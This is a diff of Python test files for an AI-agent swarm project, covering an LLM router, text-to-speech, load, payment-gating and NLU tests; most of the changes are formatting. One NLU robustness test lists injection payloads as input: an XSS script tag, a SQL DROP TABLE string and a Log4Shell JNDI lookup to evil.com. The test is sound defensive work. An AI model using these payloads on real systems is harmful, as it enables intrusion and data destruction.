router = CascadeRouter(config_path=Path("/nonexistent"))
|
||||
|
||||
|
||||
provider1 = Provider(
|
||||
name="unhealthy",
|
||||
type="ollama",
|
||||
@@ -423,25 +425,25 @@ class TestCascadeRouterComplete:
|
||||
models=[{"name": "llama3.2", "default": True}],
|
||||
)
|
||||
router.providers = [provider1, provider2]
|
||||
|
||||
|
||||
with patch.object(router, "_call_ollama") as mock_call:
|
||||
mock_call.return_value = {"content": "Success", "model": "llama3.2"}
|
||||
|
||||
|
||||
result = await router.complete(
|
||||
messages=[{"role": "user", "content": "Hi"}],
|
||||
)
|
||||
|
||||
|
||||
# Should use the healthy provider
|
||||
assert result["provider"] == "healthy"
|
||||
|
||||
|
||||
class TestProviderAvailabilityCheck:
|
||||
"""Test provider availability checking."""
|
||||
|
||||
|
||||
def test_check_ollama_without_requests(self):
|
||||
"""Test Ollama returns True when requests not available (fallback)."""
|
||||
router = CascadeRouter(config_path=Path("/nonexistent"))
|
||||
|
||||
|
||||
provider = Provider(
|
||||
name="ollama",
|
||||
type="ollama",
|
||||
@@ -449,20 +451,21 @@ class TestProviderAvailabilityCheck:
|
||||
priority=1,
|
||||
url="http://localhost:11434",
|
||||
)
|
||||
|
||||
|
||||
# When requests is None, assume available
|
||||
import infrastructure.router.cascade as cascade_module
|
||||
|
||||
old_requests = cascade_module.requests
|
||||
cascade_module.requests = None
|
||||
try:
|
||||
assert router._check_provider_available(provider) is True
|
||||
finally:
|
||||
cascade_module.requests = old_requests
|
||||
|
||||
|
||||
def test_check_openai_with_key(self):
|
||||
"""Test OpenAI with API key."""
|
||||
router = CascadeRouter(config_path=Path("/nonexistent"))
|
||||
|
||||
|
||||
provider = Provider(
|
||||
name="openai",
|
||||
type="openai",
|
||||
@@ -470,13 +473,13 @@ class TestProviderAvailabilityCheck:
|
||||
priority=1,
|
||||
api_key="sk-test123",
|
||||
)
|
||||
|
||||
|
||||
assert router._check_provider_available(provider) is True
|
||||
|
||||
|
||||
def test_check_openai_without_key(self):
|
||||
"""Test OpenAI without API key."""
|
||||
router = CascadeRouter(config_path=Path("/nonexistent"))
|
||||
|
||||
|
||||
provider = Provider(
|
||||
name="openai",
|
||||
type="openai",
|
||||
@@ -484,40 +487,40 @@ class TestProviderAvailabilityCheck:
|
||||
priority=1,
|
||||
api_key=None,
|
||||
)
|
||||
|
||||
|
||||
assert router._check_provider_available(provider) is False
|
||||
|
||||
|
||||
def test_check_airllm_installed(self):
|
||||
"""Test AirLLM when installed."""
|
||||
router = CascadeRouter(config_path=Path("/nonexistent"))
|
||||
|
||||
|
||||
provider = Provider(
|
||||
name="airllm",
|
||||
type="airllm",
|
||||
enabled=True,
|
||||
priority=1,
|
||||
)
|
||||
|
||||
|
||||
with patch("builtins.__import__") as mock_import:
|
||||
mock_import.return_value = MagicMock()
|
||||
assert router._check_provider_available(provider) is True
|
||||
|
||||
|
||||
def test_check_airllm_not_installed(self):
|
||||
"""Test AirLLM when not installed."""
|
||||
router = CascadeRouter(config_path=Path("/nonexistent"))
|
||||
|
||||
|
||||
provider = Provider(
|
||||
name="airllm",
|
||||
type="airllm",
|
||||
enabled=True,
|
||||
priority=1,
|
||||
)
|
||||
|
||||
|
||||
# Patch __import__ to simulate airllm not being available
|
||||
def raise_import_error(name, *args, **kwargs):
|
||||
if name == "airllm":
|
||||
raise ImportError("No module named 'airllm'")
|
||||
return __builtins__.__import__(name, *args, **kwargs)
|
||||
|
||||
|
||||
with patch("builtins.__import__", side_effect=raise_import_error):
|
||||
assert router._check_provider_available(provider) is False
|
||||
|
||||
@@ -19,6 +19,7 @@ class TestVoiceTTS:
|
||||
|
||||
with patch.dict("sys.modules", {"pyttsx3": mock_pyttsx3}):
|
||||
from timmy_serve.voice_tts import VoiceTTS
|
||||
|
||||
tts = VoiceTTS(rate=200, volume=0.8)
|
||||
assert tts.available is True
|
||||
mock_engine.setProperty.assert_any_call("rate", 200)
|
||||
@@ -29,6 +30,7 @@ class TestVoiceTTS:
|
||||
with patch.dict("sys.modules", {"pyttsx3": None}):
|
||||
from importlib import reload
|
||||
import timmy_serve.voice_tts as mod
|
||||
|
||||
tts = mod.VoiceTTS.__new__(mod.VoiceTTS)
|
||||
tts._engine = None
|
||||
tts._rate = 175
|
||||
@@ -39,6 +41,7 @@ class TestVoiceTTS:
|
||||
|
||||
def test_speak_skips_when_unavailable(self):
|
||||
from timmy_serve.voice_tts import VoiceTTS
|
||||
|
||||
tts = VoiceTTS.__new__(VoiceTTS)
|
||||
tts._engine = None
|
||||
tts._available = False
|
||||
@@ -48,6 +51,7 @@ class TestVoiceTTS:
|
||||
|
||||
def test_speak_sync_skips_when_unavailable(self):
|
||||
from timmy_serve.voice_tts import VoiceTTS
|
||||
|
||||
tts = VoiceTTS.__new__(VoiceTTS)
|
||||
tts._engine = None
|
||||
tts._available = False
|
||||
@@ -56,19 +60,32 @@ class TestVoiceTTS:
|
||||
|
||||
def test_speak_calls_engine(self):
|
||||
from timmy_serve.voice_tts import VoiceTTS
|
||||
|
||||
tts = VoiceTTS.__new__(VoiceTTS)
|
||||
tts._engine = MagicMock()
|
||||
tts._available = True
|
||||
tts._lock = threading.Lock()
|
||||
|
||||
tts.speak("test speech")
|
||||
# Give the background thread time to execute
|
||||
import time
|
||||
time.sleep(0.1)
|
||||
# Patch threading.Thread to capture the thread and join it
|
||||
original_thread_class = threading.Thread
|
||||
captured_threads = []
|
||||
|
||||
def capture_thread(*args, **kwargs):
|
||||
t = original_thread_class(*args, **kwargs)
|
||||
captured_threads.append(t)
|
||||
return t
|
||||
|
||||
with patch.object(threading, "Thread", side_effect=capture_thread):
|
||||
tts.speak("test speech")
|
||||
# Wait for the background thread to complete
|
||||
for t in captured_threads:
|
||||
t.join(timeout=1)
|
||||
|
||||
tts._engine.say.assert_called_with("test speech")
|
||||
|
||||
def test_speak_sync_calls_engine(self):
|
||||
from timmy_serve.voice_tts import VoiceTTS
|
||||
|
||||
tts = VoiceTTS.__new__(VoiceTTS)
|
||||
tts._engine = MagicMock()
|
||||
tts._available = True
|
||||
@@ -80,6 +97,7 @@ class TestVoiceTTS:
|
||||
|
||||
def test_set_rate(self):
|
||||
from timmy_serve.voice_tts import VoiceTTS
|
||||
|
||||
tts = VoiceTTS.__new__(VoiceTTS)
|
||||
tts._engine = MagicMock()
|
||||
tts._rate = 175
|
||||
@@ -90,6 +108,7 @@ class TestVoiceTTS:
|
||||
|
||||
def test_set_rate_no_engine(self):
|
||||
from timmy_serve.voice_tts import VoiceTTS
|
||||
|
||||
tts = VoiceTTS.__new__(VoiceTTS)
|
||||
tts._engine = None
|
||||
tts._rate = 175
|
||||
@@ -98,6 +117,7 @@ class TestVoiceTTS:
|
||||
|
||||
def test_set_volume_clamped(self):
|
||||
from timmy_serve.voice_tts import VoiceTTS
|
||||
|
||||
tts = VoiceTTS.__new__(VoiceTTS)
|
||||
tts._engine = MagicMock()
|
||||
tts._volume = 0.9
|
||||
@@ -113,12 +133,14 @@ class TestVoiceTTS:
|
||||
|
||||
def test_get_voices_no_engine(self):
|
||||
from timmy_serve.voice_tts import VoiceTTS
|
||||
|
||||
tts = VoiceTTS.__new__(VoiceTTS)
|
||||
tts._engine = None
|
||||
assert tts.get_voices() == []
|
||||
|
||||
def test_get_voices_with_engine(self):
|
||||
from timmy_serve.voice_tts import VoiceTTS
|
||||
|
||||
tts = VoiceTTS.__new__(VoiceTTS)
|
||||
mock_voice = MagicMock()
|
||||
mock_voice.id = "voice1"
|
||||
@@ -136,6 +158,7 @@ class TestVoiceTTS:
|
||||
|
||||
def test_get_voices_exception(self):
|
||||
from timmy_serve.voice_tts import VoiceTTS
|
||||
|
||||
tts = VoiceTTS.__new__(VoiceTTS)
|
||||
tts._engine = MagicMock()
|
||||
tts._engine.getProperty.side_effect = RuntimeError("no voices")
|
||||
@@ -143,6 +166,7 @@ class TestVoiceTTS:
|
||||
|
||||
def test_set_voice(self):
|
||||
from timmy_serve.voice_tts import VoiceTTS
|
||||
|
||||
tts = VoiceTTS.__new__(VoiceTTS)
|
||||
tts._engine = MagicMock()
|
||||
tts.set_voice("voice_id_1")
|
||||
@@ -150,6 +174,7 @@ class TestVoiceTTS:
|
||||
|
||||
def test_set_voice_no_engine(self):
|
||||
from timmy_serve.voice_tts import VoiceTTS
|
||||
|
||||
tts = VoiceTTS.__new__(VoiceTTS)
|
||||
tts._engine = None
|
||||
tts.set_voice("voice_id_1") # should not raise
|
||||
|
||||
@@ -31,103 +31,102 @@ from swarm.bidder import AuctionManager
|
||||
|
||||
class TestConcurrentSwarmLoad:
|
||||
"""Test swarm behavior under concurrent load."""
|
||||
|
||||
|
||||
def test_ten_simultaneous_tasks_all_assigned(self):
|
||||
"""Submit 10 tasks concurrently, verify all get assigned."""
|
||||
coord = SwarmCoordinator()
|
||||
|
||||
|
||||
# Spawn multiple personas
|
||||
personas = ["echo", "forge", "seer"]
|
||||
for p in personas:
|
||||
coord.spawn_persona(p, agent_id=f"{p}-load-001")
|
||||
|
||||
|
||||
# Submit 10 tasks concurrently
|
||||
task_descriptions = [
|
||||
f"Task {i}: Analyze data set {i}" for i in range(10)
|
||||
]
|
||||
|
||||
task_descriptions = [f"Task {i}: Analyze data set {i}" for i in range(10)]
|
||||
|
||||
tasks = []
|
||||
for desc in task_descriptions:
|
||||
task = coord.post_task(desc)
|
||||
tasks.append(task)
|
||||
|
||||
# Wait for auctions to complete
|
||||
time.sleep(0.5)
|
||||
|
||||
|
||||
# Verify all tasks exist
|
||||
assert len(tasks) == 10
|
||||
|
||||
|
||||
# Check all tasks have valid IDs
|
||||
for task in tasks:
|
||||
assert task.id is not None
|
||||
assert task.status in [TaskStatus.BIDDING, TaskStatus.ASSIGNED, TaskStatus.COMPLETED]
|
||||
|
||||
assert task.status in [
|
||||
TaskStatus.BIDDING,
|
||||
TaskStatus.ASSIGNED,
|
||||
TaskStatus.COMPLETED,
|
||||
]
|
||||
|
||||
def test_concurrent_bids_no_race_conditions(self):
|
||||
"""Multiple agents bidding concurrently doesn't corrupt state."""
|
||||
coord = SwarmCoordinator()
|
||||
|
||||
|
||||
# Open auction first
|
||||
task = coord.post_task("Concurrent bid test task")
|
||||
|
||||
|
||||
# Simulate concurrent bids from different agents
|
||||
agent_ids = [f"agent-conc-{i}" for i in range(5)]
|
||||
|
||||
|
||||
def place_bid(agent_id):
|
||||
coord.auctions.submit_bid(task.id, agent_id, bid_sats=50)
|
||||
|
||||
|
||||
with ThreadPoolExecutor(max_workers=5) as executor:
|
||||
futures = [executor.submit(place_bid, aid) for aid in agent_ids]
|
||||
concurrent.futures.wait(futures)
|
||||
|
||||
|
||||
# Verify auction has all bids
|
||||
auction = coord.auctions.get_auction(task.id)
|
||||
assert auction is not None
|
||||
# Should have 5 bids (one per agent)
|
||||
assert len(auction.bids) == 5
|
||||
|
||||
|
||||
def test_registry_consistency_under_load(self):
|
||||
"""Registry remains consistent with concurrent agent operations."""
|
||||
coord = SwarmCoordinator()
|
||||
|
||||
|
||||
# Concurrently spawn and stop agents
|
||||
def spawn_agent(i):
|
||||
try:
|
||||
return coord.spawn_persona("forge", agent_id=f"forge-reg-{i}")
|
||||
except Exception:
|
||||
return None
|
||||
|
||||
|
||||
with ThreadPoolExecutor(max_workers=10) as executor:
|
||||
futures = [executor.submit(spawn_agent, i) for i in range(10)]
|
||||
results = [f.result() for f in concurrent.futures.as_completed(futures)]
|
||||
|
||||
|
||||
# Verify registry state is consistent
|
||||
agents = coord.list_swarm_agents()
|
||||
agent_ids = {a.id for a in agents}
|
||||
|
||||
|
||||
# All successfully spawned agents should be in registry
|
||||
successful_spawns = [r for r in results if r is not None]
|
||||
for spawn in successful_spawns:
|
||||
assert spawn["agent_id"] in agent_ids
|
||||
|
||||
|
||||
def test_task_completion_under_load(self):
|
||||
"""Tasks complete successfully even with many concurrent operations."""
|
||||
coord = SwarmCoordinator()
|
||||
|
||||
|
||||
# Spawn agents
|
||||
coord.spawn_persona("forge", agent_id="forge-complete-001")
|
||||
|
||||
|
||||
# Create and process multiple tasks
|
||||
tasks = []
|
||||
for i in range(5):
|
||||
task = create_task(f"Load test task {i}")
|
||||
tasks.append(task)
|
||||
|
||||
|
||||
# Complete tasks rapidly
|
||||
for task in tasks:
|
||||
result = coord.complete_task(task.id, f"Result for {task.id}")
|
||||
assert result is not None
|
||||
assert result.status == TaskStatus.COMPLETED
|
||||
|
||||
|
||||
# Verify all completed
|
||||
completed = list_tasks(status=TaskStatus.COMPLETED)
|
||||
completed_ids = {t.id for t in completed}
|
||||
@@ -137,47 +136,47 @@ class TestConcurrentSwarmLoad:
|
||||
|
||||
class TestMemoryPersistence:
|
||||
"""Test that agent memory survives restarts."""
|
||||
|
||||
|
||||
def test_outcomes_recorded_and_retrieved(self):
|
||||
"""Write outcomes to learner, verify they persist."""
|
||||
from swarm.learner import record_outcome, get_metrics
|
||||
|
||||
|
||||
agent_id = "memory-test-agent"
|
||||
|
||||
|
||||
# Record some outcomes
|
||||
record_outcome("task-1", agent_id, "Test task", 100, won_auction=True)
|
||||
record_outcome("task-2", agent_id, "Another task", 80, won_auction=False)
|
||||
|
||||
|
||||
# Get metrics
|
||||
metrics = get_metrics(agent_id)
|
||||
|
||||
|
||||
# Should have data
|
||||
assert metrics is not None
|
||||
assert metrics.total_bids >= 2
|
||||
|
||||
|
||||
def test_memory_persists_in_sqlite(self):
|
||||
"""Memory is stored in SQLite and survives in-process restart."""
|
||||
from swarm.learner import record_outcome, get_metrics
|
||||
|
||||
|
||||
agent_id = "persist-agent"
|
||||
|
||||
|
||||
# Write memory
|
||||
record_outcome("persist-task-1", agent_id, "Description", 50, won_auction=True)
|
||||
|
||||
|
||||
# Simulate "restart" by re-querying (new connection)
|
||||
metrics = get_metrics(agent_id)
|
||||
|
||||
|
||||
# Memory should still be there
|
||||
assert metrics is not None
|
||||
assert metrics.total_bids >= 1
|
||||
|
||||
|
||||
def test_routing_decisions_persisted(self):
|
||||
"""Routing decisions are logged and queryable after restart."""
|
||||
from swarm.routing import routing_engine, RoutingDecision
|
||||
|
||||
|
||||
# Ensure DB is initialized
|
||||
routing_engine._init_db()
|
||||
|
||||
|
||||
# Create a routing decision
|
||||
decision = RoutingDecision(
|
||||
task_id="persist-route-task",
|
||||
@@ -188,13 +187,13 @@ class TestMemoryPersistence:
|
||||
capability_scores={"agent-1": 0.8, "agent-2": 0.5},
|
||||
bids_received={"agent-1": 50, "agent-2": 40},
|
||||
)
|
||||
|
||||
|
||||
# Log it
|
||||
routing_engine._log_decision(decision)
|
||||
|
||||
|
||||
# Query history
|
||||
history = routing_engine.get_routing_history(task_id="persist-route-task")
|
||||
|
||||
|
||||
# Should find the decision
|
||||
assert len(history) >= 1
|
||||
assert any(h.task_id == "persist-route-task" for h in history)
|
||||
@@ -202,53 +201,54 @@ class TestMemoryPersistence:
|
||||
|
||||
class TestL402MacaroonExpiry:
|
||||
"""Test L402 payment gating handles expiry correctly."""
|
||||
|
||||
|
||||
def test_macaroon_verification_valid(self):
|
||||
"""Valid macaroon passes verification."""
|
||||
from timmy_serve.l402_proxy import create_l402_challenge, verify_l402_token
|
||||
from timmy_serve.payment_handler import payment_handler
|
||||
|
||||
|
||||
# Create challenge
|
||||
challenge = create_l402_challenge(100, "Test access")
|
||||
macaroon = challenge["macaroon"]
|
||||
|
||||
|
||||
# Get the actual preimage from the created invoice
|
||||
payment_hash = challenge["payment_hash"]
|
||||
invoice = payment_handler.get_invoice(payment_hash)
|
||||
assert invoice is not None
|
||||
preimage = invoice.preimage
|
||||
|
||||
|
||||
# Verify with correct preimage
|
||||
result = verify_l402_token(macaroon, preimage)
|
||||
assert result is True
|
||||
|
||||
|
||||
def test_macaroon_invalid_format_rejected(self):
|
||||
"""Invalid macaroon format is rejected."""
|
||||
from timmy_serve.l402_proxy import verify_l402_token
|
||||
|
||||
|
||||
result = verify_l402_token("not-a-valid-macaroon", None)
|
||||
assert result is False
|
||||
|
||||
|
||||
def test_payment_check_fails_for_unpaid(self):
|
||||
"""Unpaid invoice returns 402 Payment Required."""
|
||||
from timmy_serve.l402_proxy import create_l402_challenge, verify_l402_token
|
||||
from timmy_serve.payment_handler import payment_handler
|
||||
|
||||
|
||||
# Create challenge
|
||||
challenge = create_l402_challenge(100, "Test")
|
||||
macaroon = challenge["macaroon"]
|
||||
|
||||
|
||||
# Get payment hash from macaroon
|
||||
import base64
|
||||
|
||||
raw = base64.urlsafe_b64decode(macaroon.encode()).decode()
|
||||
payment_hash = raw.split(":")[2]
|
||||
|
||||
|
||||
# Manually mark as unsettled (mock mode auto-settles)
|
||||
invoice = payment_handler.get_invoice(payment_hash)
|
||||
if invoice:
|
||||
invoice.settled = False
|
||||
invoice.settled_at = None
|
||||
|
||||
|
||||
# Verify without preimage should fail for unpaid
|
||||
result = verify_l402_token(macaroon, None)
|
||||
# In mock mode this may still succeed due to auto-settle
|
||||
@@ -258,24 +258,24 @@ class TestL402MacaroonExpiry:
|
||||
|
||||
class TestWebSocketResilience:
|
||||
"""Test WebSocket handling of edge cases."""
|
||||
|
||||
|
||||
def test_websocket_broadcast_no_loop_running(self):
|
||||
"""Broadcast handles case where no event loop is running."""
|
||||
from swarm.coordinator import SwarmCoordinator
|
||||
|
||||
|
||||
coord = SwarmCoordinator()
|
||||
|
||||
|
||||
# This should not crash even without event loop
|
||||
# The _broadcast method catches RuntimeError
|
||||
try:
|
||||
coord._broadcast(lambda: None)
|
||||
except RuntimeError:
|
||||
pytest.fail("Broadcast should handle missing event loop gracefully")
|
||||
|
||||
|
||||
def test_websocket_manager_handles_no_connections(self):
|
||||
"""WebSocket manager handles zero connected clients."""
|
||||
from infrastructure.ws_manager.handler import ws_manager
|
||||
|
||||
|
||||
# Should not crash when broadcasting with no connections
|
||||
try:
|
||||
# Note: This creates coroutine but doesn't await
|
||||
@@ -283,7 +283,7 @@ class TestWebSocketResilience:
|
||||
pass # ws_manager methods are async, test in integration
|
||||
except Exception:
|
||||
pytest.fail("Should handle zero connections gracefully")
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_websocket_client_disconnect_mid_stream(self):
|
||||
"""Handle client disconnecting during message stream."""
|
||||
@@ -294,41 +294,41 @@ class TestWebSocketResilience:
|
||||
|
||||
class TestVoiceNLUEdgeCases:
|
||||
"""Test Voice NLU handles edge cases gracefully."""
|
||||
|
||||
|
||||
def test_nlu_empty_string(self):
|
||||
"""Empty string doesn't crash NLU."""
|
||||
from integrations.voice.nlu import detect_intent
|
||||
|
||||
|
||||
result = detect_intent("")
|
||||
assert result is not None
|
||||
# Result is an Intent object with name attribute
|
||||
assert hasattr(result, 'name')
|
||||
|
||||
assert hasattr(result, "name")
|
||||
|
||||
def test_nlu_all_punctuation(self):
|
||||
"""String of only punctuation is handled."""
|
||||
from integrations.voice.nlu import detect_intent
|
||||
|
||||
|
||||
result = detect_intent("...!!!???")
|
||||
assert result is not None
|
||||
|
||||
|
||||
def test_nlu_very_long_input(self):
|
||||
"""10k character input doesn't crash or hang."""
|
||||
from integrations.voice.nlu import detect_intent
|
||||
|
||||
|
||||
long_input = "word " * 2000 # ~10k chars
|
||||
|
||||
|
||||
start = time.time()
|
||||
result = detect_intent(long_input)
|
||||
elapsed = time.time() - start
|
||||
|
||||
|
||||
# Should complete in reasonable time
|
||||
assert elapsed < 5.0
|
||||
assert result is not None
|
||||
|
||||
|
||||
def test_nlu_non_english_text(self):
|
||||
"""Non-English Unicode text is handled."""
|
||||
from integrations.voice.nlu import detect_intent
|
||||
|
||||
|
||||
# Test various Unicode scripts
|
||||
test_inputs = [
|
||||
"こんにちは", # Japanese
|
||||
@@ -336,22 +336,22 @@ class TestVoiceNLUEdgeCases:
|
||||
"مرحبا", # Arabic
|
||||
"🎉🎊🎁", # Emoji
|
||||
]
|
||||
|
||||
|
||||
for text in test_inputs:
|
||||
result = detect_intent(text)
|
||||
assert result is not None, f"Failed for input: {text}"
|
||||
|
||||
|
||||
def test_nlu_special_characters(self):
|
||||
"""Special characters don't break parsing."""
|
||||
from integrations.voice.nlu import detect_intent
|
||||
|
||||
|
||||
special_inputs = [
|
||||
"<script>alert('xss')</script>",
|
||||
"'; DROP TABLE users; --",
|
||||
"${jndi:ldap://evil.com}",
|
||||
"\x00\x01\x02", # Control characters
|
||||
]
|
||||
|
||||
|
||||
for text in special_inputs:
|
||||
try:
|
||||
result = detect_intent(text)
|
||||
@@ -362,45 +362,45 @@ class TestVoiceNLUEdgeCases:
|
||||
|
||||
class TestGracefulDegradation:
|
||||
"""Test system degrades gracefully under resource constraints."""
|
||||
|
||||
|
||||
def test_coordinator_without_redis_uses_memory(self):
|
||||
"""Coordinator works without Redis (in-memory fallback)."""
|
||||
from swarm.comms import SwarmComms
|
||||
|
||||
|
||||
# Create comms without Redis
|
||||
comms = SwarmComms()
|
||||
|
||||
|
||||
# Should still work for pub/sub (uses in-memory fallback)
|
||||
# Just verify it doesn't crash
|
||||
try:
|
||||
comms.publish("test:channel", "test_event", {"data": "value"})
|
||||
except Exception as exc:
|
||||
pytest.fail(f"Should work without Redis: {exc}")
|
||||
|
||||
|
||||
def test_agent_without_tools_chat_mode(self):
|
||||
"""Agent works in chat-only mode when tools unavailable."""
|
||||
from swarm.tool_executor import ToolExecutor
|
||||
|
||||
|
||||
# Force toolkit to None
|
||||
executor = ToolExecutor("test", "test-agent")
|
||||
executor._toolkit = None
|
||||
executor._llm = None
|
||||
|
||||
|
||||
result = executor.execute_task("Do something")
|
||||
|
||||
|
||||
# Should still return a result
|
||||
assert isinstance(result, dict)
|
||||
assert "result" in result
|
||||
|
||||
|
||||
def test_lightning_backend_mock_fallback(self):
|
||||
"""Lightning falls back to mock when LND unavailable."""
|
||||
from lightning import get_backend
|
||||
from lightning.mock_backend import MockBackend
|
||||
|
||||
|
||||
# Should get mock backend by default
|
||||
backend = get_backend("mock")
|
||||
assert isinstance(backend, MockBackend)
|
||||
|
||||
|
||||
# Should be functional
|
||||
invoice = backend.create_invoice(100, "Test")
|
||||
assert invoice.payment_hash is not None
|
||||
@@ -408,37 +408,37 @@ class TestGracefulDegradation:
|
||||
|
||||
class TestDatabaseResilience:
|
||||
"""Test database handles edge cases."""
|
||||
|
||||
|
||||
def test_sqlite_handles_concurrent_reads(self):
|
||||
"""SQLite handles concurrent read operations."""
|
||||
from swarm.tasks import get_task, create_task
|
||||
|
||||
|
||||
task = create_task("Concurrent read test")
|
||||
|
||||
|
||||
def read_task():
|
||||
return get_task(task.id)
|
||||
|
||||
|
||||
# Concurrent reads from multiple threads
|
||||
with ThreadPoolExecutor(max_workers=10) as executor:
|
||||
futures = [executor.submit(read_task) for _ in range(20)]
|
||||
results = [f.result() for f in concurrent.futures.as_completed(futures)]
|
||||
|
||||
|
||||
# All should succeed
|
||||
assert all(r is not None for r in results)
|
||||
assert all(r.id == task.id for r in results)
|
||||
|
||||
|
||||
def test_registry_handles_duplicate_agent_id(self):
|
||||
"""Registry handles duplicate agent registration gracefully."""
|
||||
from swarm import registry
|
||||
|
||||
|
||||
agent_id = "duplicate-test-agent"
|
||||
|
||||
|
||||
# Register first time
|
||||
record1 = registry.register(name="Test Agent", agent_id=agent_id)
|
||||
|
||||
|
||||
# Register second time (should update or handle gracefully)
|
||||
record2 = registry.register(name="Test Agent Updated", agent_id=agent_id)
|
||||
|
||||
|
||||
# Should not crash, record should exist
|
||||
retrieved = registry.get_agent(agent_id)
|
||||
assert retrieved is not None
|
||||
|
||||
Reference in New Issue
Block a user